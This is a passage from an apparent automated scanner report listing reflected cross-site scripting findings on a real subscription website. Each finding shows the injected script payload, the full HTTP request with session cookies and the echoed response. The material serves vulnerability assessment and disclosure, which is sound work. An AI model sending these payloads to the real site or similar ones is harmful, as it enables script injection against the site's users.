Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /4freetrial29/d3789<script>alert(1)</script>41a04ebeece is not found !</p>
...[SNIP]...

1.195. https://www.newsweeksubscriptions.com/4freetrial29/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/4freetrial29/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2cc"><script>alert(1)</script>8dc6c819d52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=70/4b2cc"><script>alert(1)</script>8dc6c819d522/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:01 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53154

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="70/4b2cc"><script>alert(1)</script>8dc6c819d522/29">
...[SNIP]...

1.196. https://www.newsweeksubscriptions.com/4freetrial29/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/4freetrial29/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e50a'%3balert(1)//2258684782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e50a';alert(1)//2258684782 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=70/5e50a'%3balert(1)//22586847822/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:06 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53122

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
;

   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";

url += '&off2on_login_url=/promo';

url += '&off2on_code=70/5e50a';alert(1)//22586847822/29';

       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=
...[SNIP]...

1.197. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/4freetrial29/index.php

Issue detail

The value of the off2on_code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12b7d"><script>alert(1)</script>ac719900224 was submitted in the off2on_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=702/2912b7d"><script>alert(1)</script>ac719900224 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:52 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53152

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="702/2912b7d"><script>alert(1)</script>ac719900224">
...[SNIP]...

1.198. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/4freetrial29/index.php

Issue detail

The value of the off2on_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4954c'%3balert(1)//fcaff3a8f4a was submitted in the off2on_code parameter. This input was echoed as 4954c';alert(1)//fcaff3a8f4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=702/294954c'%3balert(1)//fcaff3a8f4a HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:56 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53122

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...

   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";

url += '&off2on_login_url=/promo';

url += '&off2on_code=702/294954c';alert(1)//fcaff3a8f4a';

       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=295,
...[SNIP]...

1.199. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_login_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/4freetrial29/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 568f3"><script>alert(1)</script>baf6596ea92 was submitted in the off2on_login_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo568f3"><script>alert(1)</script>baf6596ea92&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:43 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53152

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_login_url" id="off2on_login_url" value="/promo568f3"><script>alert(1)</script>baf6596ea92">
...[SNIP]...

1.200. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_login_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/4freetrial29/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5d1c'%3balert(1)//7a28207e662 was submitted in the off2on_login_url parameter. This input was echoed as d5d1c';alert(1)//7a28207e662 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /4freetrial29/index.php?off2on_login_url=/promod5d1c'%3balert(1)//7a28207e662&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:47 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53122

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
ion()
{
   if (openguard_busy==1) { return; }
   openguard_busy=1;

   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";

url += '&off2on_login_url=/promod5d1c';alert(1)//7a28207e662';

url += '&off2on_code=702/29';

       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('
...[SNIP]...

1.201. https://www.newsweeksubscriptions.com/702FT [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/702FT

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68760<script>alert(1)</script>0202b58a743 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /702FT68760<script>alert(1)</script>0202b58a743 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:36 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 517
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /702FT68760<script>alert(1)</script>0202b58a743 is not found !</p>
...[SNIP]...

1.202. https://www.newsweeksubscriptions.com/FTcontrol/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b151f<script>alert(1)</script>4ab5958d131 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrolb151f<script>alert(1)</script>4ab5958d131/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:10:39 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 521
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolb151f<script>alert(1)</script>4ab5958d131 is not found !</p>
...[SNIP]...

1.203. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3a498<script>alert(1)</script>553705f4106 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol3a498<script>alert(1)</script>553705f4106/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:56 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol3a498<script>alert(1)</script>553705f4106/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com is not found !</p>
...[SNIP]...

1.204. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9362f<script>alert(1)</script>b77e8849252 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com9362f<script>alert(1)</script>b77e8849252 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:10 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com9362f<script>alert(1)</script>b77e8849252 is not found !</p>
...[SNIP]...

1.205. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ab24<script>alert(1)</script>620cae9ac81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol7ab24<script>alert(1)</script>620cae9ac81/Netsparker2cbd166ae342433790df4a67a21c6752.com HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:26 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol7ab24<script>alert(1)</script>620cae9ac81/Netsparker2cbd166ae342433790df4a67a21c6752.com is not found !</p>
...[SNIP]...

1.206. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34af4<script>alert(1)</script>8e3cba28bfa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com34af4<script>alert(1)</script>8e3cba28bfa HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:48 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com34af4<script>alert(1)</script>8e3cba28bfa is not found !</p>
...[SNIP]...

1.207. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad7a3<script>alert(1)</script>f0d43520fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrolad7a3<script>alert(1)</script>f0d43520fa/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:48 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 567
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolad7a3<script>alert(1)</script>f0d43520fa/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php is not found !</p>
...[SNIP]...

1.208. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 541de<script>alert(1)</script>0fa643ff5f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php541de<script>alert(1)</script>0fa643ff5f4 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:56 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
